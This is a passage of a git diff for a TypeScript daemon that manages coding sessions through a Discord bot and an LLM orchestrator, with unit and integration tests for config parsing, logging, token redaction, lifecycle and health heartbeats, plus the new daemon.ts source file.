assert.equal(cfg.discord?.token, 'test-token-123'); + assert.equal(cfg.discord?.guild_id, 'g1'); + assert.equal(cfg.log.level, 'debug'); + assert.equal(cfg.log.max_size_mb, 100); + assert.ok(cfg.log.file.startsWith(homedir())); + assert.ok(cfg.projects.scan_roots[0]!.startsWith(homedir())); + assert.equal(cfg.projects.scan_roots[1], '/absolute/path'); + }); + + it('returns defaults when config file is missing', () => { + const cfg = loadConfig('/nonexistent/path/daemon.yaml'); + assert.equal(cfg.log.level, 'info'); + assert.equal(cfg.log.max_size_mb, 50); + assert.ok(cfg.log.file.endsWith('daemon.log')); + assert.deepEqual(cfg.projects.scan_roots, []); + assert.equal(cfg.discord, undefined); + }); + + it('throws on malformed YAML', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'bad.yaml'); + writeFileSync(configPath, ':\n :\n bad: [unclosed'); + assert.throws(() => loadConfig(configPath), (err: unknown) => { + assert.ok(err instanceof Error); + assert.ok(err.message.includes('Failed to parse YAML')); + assert.ok(err.message.includes(configPath)); + return true; + }); + }); + + it('returns defaults for empty YAML file', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'empty.yaml'); + writeFileSync(configPath, ''); + const cfg = loadConfig(configPath); + assert.equal(cfg.log.level, 'info'); + assert.equal(cfg.log.max_size_mb, 50); + assert.deepEqual(cfg.projects.scan_roots, []); + }); +}); + +describe('validateConfig', () => { + // Save and clear DISCORD_BOT_TOKEN for tests that don't expect it + let savedToken: string | undefined; + before(() => { + savedToken = process.env['DISCORD_BOT_TOKEN']; + delete process.env['DISCORD_BOT_TOKEN']; + }); + after(() => { + if (savedToken !== undefined) process.env['DISCORD_BOT_TOKEN'] = savedToken; + }); + + it('fills remaining defaults for partial config', () => { + const cfg = validateConfig({ projects: { scan_roots: ['/a'] } }); + assert.equal(cfg.log.level, 'info'); + assert.equal(cfg.log.max_size_mb, 50); + assert.ok(cfg.log.file.endsWith('daemon.log')); + assert.deepEqual(cfg.projects.scan_roots, ['/a']); + assert.equal(cfg.discord, undefined); + }); + + it('falls back to info for invalid log level', () => { + const cfg = validateConfig({ log: { level: 'trace' } }); + assert.equal(cfg.log.level, 'info'); + }); + + it('returns full defaults for null input', () => { + const cfg = validateConfig(null); + assert.equal(cfg.log.level, 'info'); + assert.equal(cfg.log.max_size_mb, 50); + }); + + it('returns full defaults for non-object input', () => { + const cfg = validateConfig('not-an-object'); + assert.equal(cfg.log.level, 'info'); + }); + + it('expands ~ in log file path', () => { + const cfg = validateConfig({ log: { file: '~/my.log' } }); + assert.ok(cfg.log.file.startsWith(homedir())); + assert.ok(cfg.log.file.endsWith('my.log')); + }); + + it('overrides discord token from DISCORD_BOT_TOKEN env var', () => { + const prev = process.env['DISCORD_BOT_TOKEN']; + try { + process.env['DISCORD_BOT_TOKEN'] = 'env-override-token'; + const cfg = validateConfig({ + discord: { token: 'file-token', guild_id: 'g1', owner_id: 'o1' }, + }); + assert.equal(cfg.discord?.token, 'env-override-token'); + assert.equal(cfg.discord?.guild_id, 'g1'); + } finally { + if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN']; + else process.env['DISCORD_BOT_TOKEN'] = prev; + } + }); + + it('creates discord block from env var even when absent in config', () => { + const prev = process.env['DISCORD_BOT_TOKEN']; + try { + process.env['DISCORD_BOT_TOKEN'] = 'env-only-token'; + const cfg = validateConfig({}); + assert.equal(cfg.discord?.token, 'env-only-token'); + } finally { + if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN']; + else process.env['DISCORD_BOT_TOKEN'] = prev; + } + }); +}); + +// ---------- logger ---------- + +describe('Logger', () => { + it('writes JSON-lines entries to file', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'test.log'); + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + logger.info('hello world'); + logger.debug('detail', { key: 'val' }); + await logger.close(); + + const lines = readFileSync(logPath, 'utf-8').trim().split('\n'); + assert.equal(lines.length, 2); + + const entry0: LogEntry = JSON.parse(lines[0]!); + assert.equal(entry0.level, 'info'); + assert.equal(entry0.msg, 'hello world'); + assert.ok(entry0.ts); // ISO-8601 + + const entry1: LogEntry = JSON.parse(lines[1]!); + assert.equal(entry1.level, 'debug'); + assert.equal(entry1.msg, 'detail'); + assert.deepEqual(entry1.data, { key: 'val' }); + }); + + it('filters entries below configured level', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'filter.log'); + + const logger = new Logger({ filePath: logPath, level: 'warn' }); + logger.debug('should not appear'); + logger.info('should not appear either'); + logger.warn('visible warning'); + logger.error('visible error'); + await logger.close(); + + const lines = readFileSync(logPath, 'utf-8').trim().split('\n'); + assert.equal(lines.length, 2); + assert.equal((JSON.parse(lines[0]!) as LogEntry).level, 'warn'); + assert.equal((JSON.parse(lines[1]!) as LogEntry).level, 'error'); + }); + + it('close() resolves after stream ends', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'close.log'); + + const logger = new Logger({ filePath: logPath, level: 'info' }); + logger.info('before close'); + await logger.close(); + + // File should be readable and contain the entry + const content = readFileSync(logPath, 'utf-8'); + assert.ok(content.includes('before close')); + }); + + it('creates parent directories if they do not exist', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'nested', 'deep', 'test.log'); + + const logger = new Logger({ filePath: logPath, level: 'info' }); + logger.info('nested dir test'); + await logger.close(); + + assert.ok(existsSync(logPath)); + const content = readFileSync(logPath, 'utf-8'); + assert.ok(content.includes('nested dir test')); + }); + + it('does not include data field when not provided', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'nodata.log'); + + const logger = new Logger({ filePath: logPath, level: 'info' }); + logger.info('no extra data'); + await logger.close(); + + const entry: LogEntry = JSON.parse(readFileSync(logPath, 'utf-8').trim()); + assert.equal(entry.data, undefined); + // Also verify the raw JSON doesn't contain "data" key + assert.ok(!readFileSync(logPath, 'utf-8').includes('"data"')); + }); +}); + +// ---------- token safety ---------- + +describe('token safety', () => { + it('discord token never appears in log output', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'token-safety.log'); + + // Config with a token + const prev = process.env['DISCORD_BOT_TOKEN']; + try { + process.env['DISCORD_BOT_TOKEN'] = 'super-secret-token-value'; + const cfg = validateConfig({}); + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + // Log the config object — token must not leak + logger.info('config loaded', { discord_configured: !!cfg.discord }); + logger.debug('startup complete'); + await logger.close(); + + const content = readFileSync(logPath, 'utf-8'); + assert.ok(!content.includes('super-secret-token-value')); + } finally { + if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN']; + else process.env['DISCORD_BOT_TOKEN'] = prev; + } + }); +}); + +// ---------- daemon lifecycle ---------- + +// Resolve the dist/ directory for spawning CLI +const __filename = fileURLToPath(import.meta.url); +const __dirname = dirname(__filename); + +describe('Daemon', () => { + it('logs lifecycle events on start and shutdown', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-lifecycle.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: ['/a', '/b'] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + // start() should have logged 'daemon started' + // shutdown() directly — we override process.exit to prevent test runner from dying + const origExit = process.exit; + let exitCode: number | undefined; + // @ts-expect-error — overriding process.exit for test + process.exit = (code?: number) => { exitCode = code ?? 0; }; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + assert.equal(exitCode, 0); + + const content = readFileSync(logPath, 'utf-8'); + const lines = content.trim().split('\n'); + + // First line: daemon started + const startEntry: LogEntry = JSON.parse(lines[0]!); + assert.equal(startEntry.msg, 'daemon started'); + assert.equal(startEntry.data?.scan_roots, 2); + assert.equal(startEntry.data?.discord_configured, false); + + // Second line: daemon shutting down + const stopEntry: LogEntry = JSON.parse(lines[1]!); + assert.equal(stopEntry.msg, 'daemon shutting down'); + }); + + it('shutdown is idempotent — second call is a no-op', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'idempotent.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const origExit = process.exit; + let exitCount = 0; + // @ts-expect-error — overriding process.exit for test + process.exit = () => { exitCount++; }; + try { + await daemon.shutdown(); + await daemon.shutdown(); // second call — should be no-op + } finally { + process.exit = origExit; + } + + assert.equal(exitCount, 1, 'process.exit should be called exactly once'); + + const lines = readFileSync(logPath, 'utf-8').trim().split('\n'); + const shutdownLines = lines.filter(l => { + const e: LogEntry = JSON.parse(l); + return e.msg === 'daemon shutting down'; + }); + assert.equal(shutdownLines.length, 1, 'shutdown log should appear exactly once'); + }); +}); + +// ---------- Health heartbeat ---------- + +describe('Health heartbeat', () => { + it('logs health entry with expected fields after interval tick', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'health.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + // Use 50ms interval for fast test + const daemon = new Daemon(config, logger, 50); + + await daemon.start(); + + // Wait for at least one health tick + await new Promise((r) => setTimeout(r, 120)); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + const content = readFileSync(logPath, 'utf-8'); + const lines = content.trim().split('\n'); + const healthLines = lines.filter((l) => { + const e: LogEntry = JSON.parse(l); + return e.msg === 'health'; + }); + + assert.ok(healthLines.length >= 1, 'should have at least one health log entry'); + + const entry: LogEntry = JSON.parse(healthLines[0]!); + assert.equal(entry.msg, 'health'); + assert.equal(typeof entry.data?.uptime_s, 'number'); + assert.equal(typeof entry.data?.active_sessions, 'number'); + assert.equal(typeof entry.data?.discord_connected, 'boolean'); + assert.equal(typeof entry.data?.memory_rss_mb, 'number'); + assert.equal(entry.data?.discord_connected, false); // no discord configured + assert.equal(entry.data?.active_sessions, 0); // no sessions + }); + + it('health timer is cleared on shutdown — no lingering intervals', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'health-cleanup.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + // Use 50ms interval + const daemon = new Daemon(config, logger, 50); + + await daemon.start(); + + // Wait for one tick + await new Promise((r) => setTimeout(r, 80)); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + // Count health entries at shutdown + const contentAtShutdown = readFileSync(logPath, 'utf-8'); + const healthCountAtShutdown = contentAtShutdown + .trim() + .split('\n') + .filter((l) => JSON.parse(l).msg === 'health').length; + + // Wait another interval — no new health entries should appear + await new Promise((r) => setTimeout(r, 120)); + + // Re-read (logger is closed, so file shouldn't change) + const contentAfterWait = readFileSync(logPath, 'utf-8'); + const healthCountAfterWait = contentAfterWait + .trim() + .split('\n') + .filter((l) => JSON.parse(l).msg === 'health').length; + + assert.equal( + healthCountAfterWait, + healthCountAtShutdown, + 'no new health entries should appear after shutdown', + ); + }); +}); + +describe('CLI integration', () => { + it('--help prints usage and exits 0', () => { + const result = execFileSync( + process.execPath, + [join(__dirname, 'cli.js'), '--help'], + { encoding: 'utf-8', timeout: 5000 }, + ); + assert.ok(result.includes('Usage: gsd-daemon')); + assert.ok(result.includes('--config')); + assert.ok(result.includes('--verbose')); + }); + + it('starts, logs to file, and exits cleanly on SIGTERM', { timeout: 15000 }, async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'integration.log'); + const configPath = join(dir, 'daemon.yaml'); + + writeFileSync(configPath, ` +projects: + scan_roots: + - /tmp/test-project +log: + file: "${logPath}" + level: info + max_size_mb: 10 +`); + + // Use execFile with a wrapper script approach: spawn, wait for start, SIGTERM, verify + const exitCode = await new Promise((resolve, reject) => { + const child = spawn( + process.execPath, + [join(__dirname, 'cli.js'), '--config', configPath], + { stdio: 'ignore' }, + ); + + let resolved = false; + child.on('error', (err) => { if (!resolved) { resolved = true; reject(err); } }); + child.on('exit', (code) => { if (!resolved) { resolved = true; resolve(code ?? 1); } }); + + // Poll for startup, then send SIGTERM + const poll = setInterval(() => { + if (existsSync(logPath)) { + const content = readFileSync(logPath, 'utf-8'); + if (content.includes('daemon started')) { + clearInterval(poll); + child.kill('SIGTERM'); + } + } + }, 100); + + // Safety: kill child if it takes too long + setTimeout(() => { + clearInterval(poll); + if (!resolved) { + child.kill('SIGKILL'); + resolved = true; + reject(new Error('timed out waiting for daemon')); + } + }, 10000); + }); + + assert.equal(exitCode, 0, 'daemon should exit with code 0 on SIGTERM'); + + // Small delay for filesystem flush + await new Promise(r => setTimeout(r, 100)); + + // Verify log file contents + const finalContent = readFileSync(logPath, 'utf-8'); + assert.ok(finalContent.includes('daemon started'), 'log should contain startup entry'); + assert.ok(finalContent.includes('daemon shutting down'), 'log should contain shutdown entry'); + + // Verify log entries are valid JSON-lines + const lines = finalContent.trim().split('\n'); + for (const line of lines) { + const entry: LogEntry = JSON.parse(line); + assert.ok(entry.ts, 'each entry should have a timestamp'); + assert.ok(entry.level, 'each entry should have a level'); + assert.ok(entry.msg, 'each entry should have a message'); + } + }); + + it('exits with code 1 on invalid config', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'bad.yaml'); + writeFileSync(configPath, ':\n :\n bad: [unclosed'); + + try { + execFileSync( + process.execPath, + [join(__dirname, 'cli.js'), '--config', configPath], + { encoding: 'utf-8', timeout: 5000 }, + ); + assert.fail('should have thrown'); + } catch (err: unknown) { + // execFileSync throws on non-zero exit + const execErr = err as { status: number; stderr: string }; + assert.equal(execErr.status, 1); + assert.ok(execErr.stderr.includes('fatal')); + } + }); +}); + +// ---------- Daemon + SessionManager integration ---------- + +describe('Daemon integration', () => { + it('getSessionManager() returns SessionManager after start()', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-sm.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const sm = daemon.getSessionManager(); + assert.ok(sm instanceof SessionManager); + + // Clean shutdown + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); + + it('getSessionManager() throws before start()', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-nostart.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + assert.throws( + () => daemon.getSessionManager(), + (err: Error) => { + assert.ok(err.message.includes('Daemon not started')); + return true; + } + ); + + // Close logger to prevent async write stream from hitting cleaned-up tmpdir + await logger.close(); + }); + + it('scanProjects() delegates to scanForProjects with configured roots', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-scan.log'); + + // Create a fake project root with a project that has a .git marker + const scanRoot = join(dir, 'projects'); + mkdirSync(scanRoot); + const projectDir = join(scanRoot, 'my-project'); + mkdirSync(projectDir); + mkdirSync(join(projectDir, '.git')); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [scanRoot] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const projects = await daemon.scanProjects(); + assert.ok(projects.length >= 1); + const found = projects.find(p => p.name === 'my-project'); + assert.ok(found); + assert.ok(found.markers.includes('git')); + + // Clean shutdown + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); + + it('shutdown cleans up sessionManager before closing logger', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-cleanup.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + // Access sessionManager to verify it exists + const sm = daemon.getSessionManager(); + assert.ok(sm); + + // Shutdown — should not throw even though sessionManager has no active sessions + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + // Verify log contains both started and shutting down + const content = readFileSync(logPath, 'utf-8'); + assert.ok(content.includes('daemon started')); + assert.ok(content.includes('daemon shutting down')); + }); +}); diff --git a/packages/daemon/src/daemon.ts b/packages/daemon/src/daemon.ts new file mode 100644 index 000000000..8b1db3db6 --- /dev/null +++ b/packages/daemon/src/daemon.ts @@ -0,0 +1,199 @@ +import type { DaemonConfig, ProjectInfo } from './types.js'; +import type { Logger } from './logger.js'; +import { SessionManager } from './session-manager.js'; +import { scanForProjects } from './project-scanner.js'; +import { DiscordBot, validateDiscordConfig } from './discord-bot.js'; +import { EventBridge } from './event-bridge.js'; +import { Orchestrator } from './orchestrator.js'; + +/** + * Core daemon class — ties config + logger together with lifecycle management. + * Registers SIGTERM/SIGINT handlers for clean shutdown. + */ +export class Daemon { + private shuttingDown = false; + private keepaliveTimer: ReturnType | undefined; + private healthTimer: ReturnType | undefined; + private readonly onSigterm: () => void; + private readonly onSigint: () => void; + private sessionManager: SessionManager | undefined; + private discordBot: DiscordBot | undefined; + private eventBridge: EventBridge | undefined; + private orchestrator: Orchestrator | undefined; + + constructor( + private readonly config: DaemonConfig, + private readonly logger: Logger, + private readonly healthIntervalMs: number = 300_000, + ) { + this.onSigterm = () => void this.shutdown(); + this.onSigint = () => void this.shutdown(); + } + + /** Start the daemon: log startup info, register signal handlers, start keepalive. */ + async start(): Promise { + this.sessionManager = new SessionManager(this.logger); + + this.logger.info('daemon started', { + log_level: this.config.log.level, + scan_roots: this.config.projects.scan_roots.length, + discord_configured: !!this.config.discord, + }); + + process.on('SIGTERM', this.onSigterm); + process.on('SIGINT', this.onSigint); + + // Keep the event loop alive. The write stream alone doesn't hold a ref + // when there's no pending I/O, so we need an explicit timer. + this.keepaliveTimer = setInterval(() => {}, 60_000); + + // Conditionally start Discord bot if config is present and valid + if (this.config.discord?.token) { + try { + validateDiscordConfig(this.config.discord); + this.discordBot = new DiscordBot({ + config: this.config.discord, + logger: this.logger, + sessionManager: this.sessionManager, + scanProjects: () => this.scanProjects(), + }); + await this.discordBot.login(); + + // Wire up EventBridge after bot is ready + const channelManager = this.discordBot.getChannelManager(); + const client = this.discordBot.getClient(); + if (channelManager && client) { + this.eventBridge = new EventBridge({ + sessionManager: this.sessionManager, + channelManager, + client, + config: this.config, + logger: this.logger, + ownerId: this.config.discord.owner_id, + }); + this.discordBot.setEventBridge(this.eventBridge); + this.eventBridge.start(); + this.logger.info('event bridge wired'); + + // Wire up Orchestrator if control_channel_id is configured + if (this.config.discord.control_channel_id) { + this.orchestrator = new Orchestrator({ + sessionManager: this.sessionManager, + channelManager, + scanProjects: () => this.scanProjects(), + config: { + model: this.config.discord.orchestrator?.model ?? 'claude-haiku-4-5-20251001', + max_tokens: this.config.discord.orchestrator?.max_tokens ?? 1024, + control_channel_id: this.config.discord.control_channel_id, + }, + logger: this.logger, + ownerId: this.config.discord.owner_id, + }); + client.on('messageCreate', (message) => { + void this.orchestrator!.handleMessage(message); + }); + this.logger.info('orchestrator wired', { + control_channel_id: this.config.discord.control_channel_id, + }); + } + } else { + this.logger.warn('event bridge skipped — channel manager or client not available'); + } + } catch (err) { + // Log error but don't abort daemon startup — bot is optional + this.logger.error('discord bot login failed', { + error: err instanceof Error ? err.message : String(err), + }); + this.discordBot = undefined; + } + } + + // Health heartbeat — logs uptime, session count, Discord status, memory + const startTime = Date.now(); + this.healthTimer = setInterval(() => { + const sessions = this.sessionManager?.getAllSessions() ?? []; + const activeSessions = sessions.filter( + (s) => s.status === 'running' || s.status === 'blocked', + ).length; + this.logger.info('health', { + uptime_s: Math.floor((Date.now() - startTime) / 1000), + active_sessions: activeSessions, + discord_connected: !!this.discordBot?.getClient()?.isReady(), + memory_rss_mb: Math.round(process.memoryUsage().rss / 1024 / 1024), + }); + }, this.healthIntervalMs); + } + + /** Scan configured project roots for project directories. */ + async scanProjects(): Promise { + return scanForProjects(this.config.projects.scan_roots); + } + + /** Accessor for the session manager (available after start()). */ + getSessionManager(): SessionManager { + if (!this.sessionManager) { + throw new Error('Daemon not started — call start() before accessing the session manager'); + } + return this.sessionManager; + } + + /** Accessor for the event bridge (available after start() with Discord configured). */ + getEventBridge(): EventBridge | undefined { + return this.eventBridge; + } + + /** Accessor for the orchestrator (available after start() with control_channel_id configured). */ + getOrchestrator(): Orchestrator | undefined { + return this.orchestrator; + } + + /** Idempotent shutdown: log, cleanup sessions, close logger, exit. */ + async shutdown(): Promise { + if (this.shuttingDown) return; + this.shuttingDown = true; + + this.logger.info('daemon shutting down'); + + // Remove signal handlers to avoid double-fire + process.removeListener('SIGTERM', this.onSigterm); + process.removeListener('SIGINT', this.onSigint); + + // Clear health heartbeat timer + if (this.healthTimer) { + clearInterval(this.healthTimer); + this.healthTimer = undefined; + } + + // Clear keepalive so the event loop can drain + if (this.keepaliveTimer) { + clearInterval(this.keepaliveTimer); + this.keepaliveTimer = undefined; + } + + // Stop Orchestrator first + if (this.orchestrator) { + this.orchestrator.stop(); + this.orchestrator = undefined; + } + + // Stop EventBridge before Discord bot destroy + if (this.eventBridge) { + await this.eventBridge.stop(); + this.eventBridge = undefined; + } + + // Destroy Discord bot before session cleanup + if (this.discordBot) { + await this.discordBot.destroy(); + this.discordBot = undefined; + } + + // Clean up active sessions before closing logger + if (this.sessionManager) { + await this.sessionManager.cleanup(); + } + + await this.logger.close(); + process.exit(0); + } +} diff --git a/packages/daemon/src/discord-bot.test.ts b/packages/daemon/src/discord-bot.test.ts new file mode 100644 index 000000000..e450fd885 --- /dev/null +++ b/packages/daemon/src/discord-bot.test.ts @@ -0,0 +1,792 @@ +import { describe, it, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, readFileSync, rmSync, existsSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { ChannelType } from 'discord.js'; +import { isAuthorized, validateDiscordConfig } from './discord-bot.js'; +import { sanitizeChannelName, ChannelManager } from './channel-manager.js'; +import { buildCommands, formatSessionStatus } from './commands.js'; +import { Daemon } from './daemon.js'; +import { Logger } from './logger.js'; +import { validateConfig } from './config.js'; +import type { DaemonConfig, LogEntry, ManagedSession } from './types.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `discord-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +// ---------- isAuthorized ---------- + +describe('isAuthorized', () => { + it('returns true when userId matches ownerId', () => { + assert.equal(isAuthorized('12345', '12345'), true); + }); + + it('returns false when userId does not match ownerId', () => { + assert.equal(isAuthorized('12345', '99999'), false); + }); + + it('returns false when ownerId is empty', () => { + assert.equal(isAuthorized('12345', ''), false); + }); + + it('returns false when userId is empty', () => { + assert.equal(isAuthorized('', '12345'), false); + }); + + it('returns false when both are empty', () => { + assert.equal(isAuthorized('', ''), false); + }); +}); + +// ---------- validateDiscordConfig ---------- + +describe('validateDiscordConfig', () => { + it('passes with all required fields', () => { + assert.doesNotThrow(() => { + validateDiscordConfig({ + token: 'test-token', + guild_id: 'g123', + owner_id: 'o456', + }); + }); + }); + + it('throws on undefined config', () => { + assert.throws( + () => validateDiscordConfig(undefined), + (err: Error) => { + assert.ok(err.message.includes('undefined')); + return true; + }, + ); + }); + + it('throws on missing token', () => { + assert.throws( + () => validateDiscordConfig({ token: '', guild_id: 'g1', owner_id: 'o1' }), + (err: Error) => { + assert.ok(err.message.includes('token')); + return true; + }, + ); + }); + + it('throws on whitespace-only token', () => { + assert.throws( + () => validateDiscordConfig({ token: ' ', guild_id: 'g1', owner_id: 'o1' }), + (err: Error) => { + assert.ok(err.message.includes('token')); + return true; + }, + ); + }); + + it('throws on missing guild_id', () => { + assert.throws( + () => validateDiscordConfig({ token: 'tok', guild_id: '', owner_id: 'o1' }), + (err: Error) => { + assert.ok(err.message.includes('guild_id')); + return true; + }, + ); + }); + + it('throws on missing owner_id', () => { + assert.throws( + () => validateDiscordConfig({ token: 'tok', guild_id: 'g1', owner_id: '' }), + (err: Error) => { + assert.ok(err.message.includes('owner_id')); + return true; + }, + ); + }); +}); + +// ---------- Daemon wiring ---------- + +describe('Daemon + DiscordBot wiring', () => { + it('does not create DiscordBot when discord config is absent', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-discord.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + const content = readFileSync(logPath, 'utf-8'); + // Should NOT have any bot-related log entries + assert.ok(!content.includes('bot ready')); + assert.ok(!content.includes('discord bot login failed')); + assert.ok(!content.includes('bot destroyed')); + }); + + it('logs error when discord config has token but login fails (no real gateway)', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'bad-token.log'); + + const config: DaemonConfig = { + discord: { + token: 'invalid-token-that-will-fail-login', + guild_id: 'g1', + owner_id: 'o1', + }, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + // start() should NOT throw — bot login failure is non-fatal + await daemon.start(); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + // Small flush delay + await new Promise((r) => setTimeout(r, 50)); + + const content = readFileSync(logPath, 'utf-8'); + // Should have logged the login failure + assert.ok(content.includes('discord bot login failed'), 'should log bot login failure'); + // Token should never appear in logs + assert.ok(!content.includes('invalid-token-that-will-fail-login'), 'token must not appear in logs'); + }); + + it('does not attempt login when discord config has no token', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-token.log'); + + // Config with discord block but empty token + const config: DaemonConfig = { + discord: { + token: '', + guild_id: 'g1', + owner_id: 'o1', + }, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + const content = readFileSync(logPath, 'utf-8'); + // Should not attempt login — no token + assert.ok(!content.includes('discord bot login failed')); + assert.ok(!content.includes('bot ready')); + }); +}); + +// ---------- sanitizeChannelName ---------- + +describe('sanitizeChannelName', () => { + it('converts basic path to gsd-prefixed name', () => { + assert.equal(sanitizeChannelName('/home/user/my-project'), 'gsd-my-project'); + }); + + it('converts path with special characters to hyphens', () => { + assert.equal(sanitizeChannelName('/home/user/My_Cool.Project!v2'), 'gsd-my-cool-project-v2'); + }); + + it('truncates very long names to 100 chars', () => { + const longName = 'a'.repeat(200); + const result = sanitizeChannelName(`/home/${longName}`); + assert.ok(result.length <= 100, `Expected <= 100 chars, got ${result.length}`); + assert.ok(result.startsWith('gsd-')); + }); + + it('cleans leading/trailing dots and underscores', () => { + assert.equal(sanitizeChannelName('/home/...___project___...'), 'gsd-project'); + }); + + it('returns gsd-unnamed for empty basename', () => { + assert.equal(sanitizeChannelName(''), 'gsd-unnamed'); + assert.equal(sanitizeChannelName('/'), 'gsd-unnamed'); + }); + + it('returns gsd-unnamed for basename with only special chars', () => { + assert.equal(sanitizeChannelName('/home/!!!'), 'gsd-unnamed'); + }); + + it('collapses consecutive hyphens', () => { + assert.equal(sanitizeChannelName('/home/a---b---c'), 'gsd-a-b-c'); + }); + + it('handles Windows-style backslash paths', () => { + assert.equal(sanitizeChannelName('C:\\Users\\lex\\my-project'), 'gsd-my-project'); + }); + + it('handles name at exact prefix + 96 chars = 100 char limit', () => { + // gsd- is 4 chars, so a 96-char basename should produce exactly 100 + const name96 = 'a'.repeat(96); + const result = sanitizeChannelName(`/home/${name96}`); + assert.equal(result.length, 100); + assert.equal(result, `gsd-${'a'.repeat(96)}`); + }); + + it('handles 